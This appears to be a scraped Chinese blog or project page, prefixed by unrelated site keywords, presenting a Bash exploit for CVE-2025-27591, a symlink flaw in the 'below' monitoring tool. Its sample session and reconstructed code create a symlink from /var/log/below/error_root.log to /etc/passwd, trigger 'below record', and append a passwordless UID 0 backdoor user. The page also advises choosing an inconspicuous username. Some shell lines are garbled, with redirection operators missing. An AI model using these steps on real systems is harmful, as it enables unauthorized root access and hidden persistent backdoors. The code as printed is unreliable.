2026/5/21 16:54:04
网站建设
项目流程
做天然文化石的网站,自适应网站建设需要注意什么,电子商务网站备案,公司建设网站的请示CVE-2025-27591 Exploit - Below Logger Symlink Attack
项目标题与描述
CVE-2025-27591 Below日志符号链接攻击利用工具
本项目是一个基于Bash的权限提升漏洞利用脚本#xff0c;专门针对Facebook开发的系统性能监控工具below。该工具利用below在日志记录机制中存在的一个符号…CVE-2025-27591 Exploit - Below Logger Symlink Attack项目标题与描述CVE-2025-27591 Below日志符号链接攻击利用工具本项目是一个基于Bash的权限提升漏洞利用脚本专门针对Facebook开发的系统性能监控工具below。该工具利用below在日志记录机制中存在的一个符号链接漏洞CVE-2025-27591通过向/etc/passwd文件注入具有root权限的用户条目从而获取完整的root系统访问权限。该漏洞由Matthias Gerstney发现并报告给SUSE安全团队。功能特性根据代码分析本利用工具具有以下核心功能自动化漏洞检测自动检查目标系统上/var/log/below日志目录是否全局可写这是漏洞存在的必要条件。符号链接创建与管理自动删除可能存在的旧日志文件并创建从/var/log/below/error_root.log到/etc/passwd的符号链接。权限提升注入通过触发below record命令产生错误日志该日志会被写入符号链接指向的/etc/passwd文件。脚本随后会手动向/etc/passwd文件尾部追加一个精心构造的用户行该用户具有root权限UID0和空密码从而实现提权。智能回退与清理包含失败重试机制如below命令不存在时的回退方案并在利用成功后提供清理已添加用户的指导。详细流程输出脚本执行过程中会输出详细的步骤说明、状态检查和利用结果方便用户了解执行进度。安装指南此项目为独立的Bash脚本利用工具无需复杂的安装过程。系统要求与依赖项操作系统基于Linux的系统因为利用了特定的路径/etc/passwd和/var/log/below。目标环境系统中必须安装了存在漏洞版本的below工具并且其日志目录/var/log/below的权限设置不当全局可写。脚本解释器需要bash环境来执行脚本。必要权限执行脚本的用户需要具备在/var/log/below目录下创建和删除文件的权限这通常意味着该目录是全局可写的。工具依赖脚本尝试使用below命令来触发漏洞并使用了sudo、useradd等系统命令进行权限检查和用户管理。“安装”步骤实际上你只需要获取脚本文件并确保其具有可执行权限即可。# 1. 克隆或下载脚本文件假设文件名为 exploit.sh# 2. 赋予脚本执行权限chmodx exploit.sh# 3. 在存在漏洞的环境中执行./exploit.sh重要警告此脚本仅用于授权下的安全测试、教育和研究目的。在未经许可的系统上使用是非法且不道德的。使用说明执行脚本后它会引导你完成整个利用过程。启动脚本在终端中运行脚本。提供用户名脚本首先会提示你输入一个用于提权的用户名。你可以选择一个不容易被注意到的名字。自动化检测与利用脚本随后会自动执行以下步骤检查漏洞存在的条件日志目录权限。创建必要的符号链接。尝试触发below记录错误。向/etc/passwd文件注入具有root权限的用户。获取Root Shell如果利用成功脚本会显示如何使用新创建的用户通过su命令切换到root权限。清理手动脚本在最后会提示你成功提权后需要手动编辑/etc/passwd文件删除添加的那一行以进行清理。典型使用场景代码片段提示脚本运行后你会看到类似以下的交互过程具体输出取决于脚本内容$ ./exploit.sh[]Welcome to the CVE-2025-27591 exploit![?]Please enter your desired backdoor username: testroot[]Checkingif/var/log/below is world-writable...[]Directory is vulnerable![]Removing existing error_root.log...[]Creating symlink from error_root.log to /etc/passwd...[]Triggering below record towriteto symlink...[]Manually injecting user entry into /etc/passwd...[]Exploit successful!Usertestrootadded withUID0.[]Spawn root shell with:sutestroot[!]Remember to remove the added line from /etc/passwd after exploitation.核心代码由于提供的代码片段不完整无法展示完整的核心代码及其注释。但根据项目描述和功能分析其核心逻辑主要围绕以下几个关键操作我们可以用伪代码和说明来概括1. 漏洞条件检查# 检查日志目录是否全局可写这是攻击的前提if[-w /var/log/below][$(stat-c %a /var/log/below)-ge722];thenecho[] Directory is vulnerable!elseecho[-] Exploit condition not met. Exiting.exit1fi2. 创建符号链接# 移除可能存在的旧日志文件创建指向/etc/passwd的符号链接rm-f /var/log/below/error_root.logln-s /etc/passwd /var/log/below/error_root.log# 验证链接是否创建成功if[-L /var/log/below/error_root.log];thenecho[] Symlink created successfully.fi3. 触发漏洞并注入用户# 尝试运行below命令以触发错误日志写入写入符号链接指向的/etc/passwdbelow record2/dev/null||true# 关键步骤手动向/etc/passwd文件尾部追加一个root用户条目# 格式username:password:UID:GID:comment:home:shell# 这里使用“”表示空密码字段UID为0表示root权限。echo$BACKDOOR_USER::0:0::/root:/bin/bash/etc/passwdecho[] User $BACKDOOR_USER injected into /etc/passwd with UID 0.4. 提权与清理提示# 提示用户如何使用新创建的用户获得root shellecho[] To gain root access, run: su$BACKDOOR_USER# 在密码提示符下直接按回车因为密码字段为空。echo[!] IMPORTANT: After successful exploitation, manually edit /etc/passwd to remove the line for $BACKDOOR_USER.代码注释要点实际的脚本应该包含详细的注释解释每个步骤的目的例如“# 创建符号链接将日志错误重定向到系统密码文件”。应该包含错误处理例如检查ln -s或echo 命令是否执行成功。可能包含对below命令是否存在的检查并提供替代的触发方法如直接向文件写入特定内容模拟错误日志。6HFtX5dABrKlqXeO5PUv/9bhuFNUCgu49PD61kHBnrwPPyofXGUNXhJ6l7AddsFDFtkcTtjRSv8RaXpQxzLag更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享